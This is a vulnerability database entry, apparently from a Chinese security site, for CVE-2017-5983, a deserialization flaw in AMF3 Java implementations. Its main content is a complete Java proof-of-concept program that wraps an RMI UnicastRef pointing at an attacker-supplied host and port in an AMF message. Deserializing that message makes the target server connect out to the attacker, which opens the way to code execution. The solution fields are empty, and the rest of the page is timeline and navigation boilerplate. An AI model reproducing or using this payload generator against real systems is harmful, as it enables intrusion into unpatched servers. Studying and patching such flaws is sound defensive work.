AMF3 Java implementations deserialization Vulnerability

基本字段

漏洞编号：: SSV-92913

披露/发现时间：: 未知

提交时间：: 2017-04-06

漏洞等级：

漏洞类别：: 代码执行

影响组件：

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: CVE-2017-5983

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

https://www.kb.cert.org/vuls/id/307983

漏洞详情

贡献者 Knownsec 共获得 0KB

共 0 兑换了

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0KB

import java.io.ByteArrayInputStream; import java.io.ByteArrayOutputStream; import java.io.IOException; import java.util.Arrays; import flex.messaging.io.SerializationContext; import flex.messaging.io.amf.ActionContext; import flex.messaging.io.amf.ActionMessage; import flex.messaging.io.amf.AmfMessageDeserializer; import flex.messaging.io.amf.AmfMessageSerializer; import flex.messaging.io.amf.MessageBody; public class Amf3ExternalizableUnicastRef { public static void main(String[] args) throws IOException, ClassNotFoundException { if (args.length < 2 || (args.length == 3 && !args[0].equals("-d"))) { System.err.println("usage: java -jar " + Amf3ExternalizableUnicastRef.class.getSimpleName() + ".jar [-d] <host> <port>"); return; } boolean doDeserialize = false; if (args.length == 3) { doDeserialize = true; args = Arrays.copyOfRange(args, 1, args.length); } // generate the UnicastRef object Object unicastRef = generateUnicastRef(args[0], Integer.parseInt(args[1])); // serialize object to AMF message byte[] amf = serialize(unicastRef); // deserialize AMF message if (doDeserialize) { deserialize(amf); } else { System.out.write(amf); } } public static Object generateUnicastRef(String host, int port) { java.rmi.server.ObjID objId = new java.rmi.server.ObjID(); sun.rmi.transport.tcp.TCPEndpoint endpoint = new sun.rmi.transport.tcp.TCPEndpoint(host, port); sun.rmi.transport.LiveRef liveRef = new sun.rmi.transport.LiveRef(objId, endpoint, false); return new sun.rmi.server.UnicastRef(liveRef); } public static byte[] serialize(Object data) throws IOException { MessageBody body = new MessageBody(); body.setData(data); ActionMessage message = new ActionMessage(); message.addBody(body); ByteArrayOutputStream out = new ByteArrayOutputStream(); AmfMessageSerializer serializer = new AmfMessageSerializer(); serializer.initialize(SerializationContext.getSerializationContext(), out, null); serializer.writeMessage(message); return out.toByteArray(); } public static void deserialize(byte[] amf) throws ClassNotFoundException, IOException { ByteArrayInputStream in = new ByteArrayInputStream(amf); AmfMessageDeserializer deserializer = new AmfMessageDeserializer(); deserializer.initialize(SerializationContext.getSerializationContext(), in, null); deserializer.readMessage(new ActionMessage(), new ActionContext()); } }

共 0 兑换

参考链接

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

生命线

发现/披露了漏洞
Knownsec

2017-04-06 提交了漏洞
Knownsec

2017-04-06 提交补充了漏洞详情
Knownsec

2017-04-06 补充了漏洞详情
Knownsec

2017-04-06 提交更新了 PoC

AMF3 Java implementations deserialization Vulnerability

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

AMF3 Java implementations deserialization Vulnerability

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定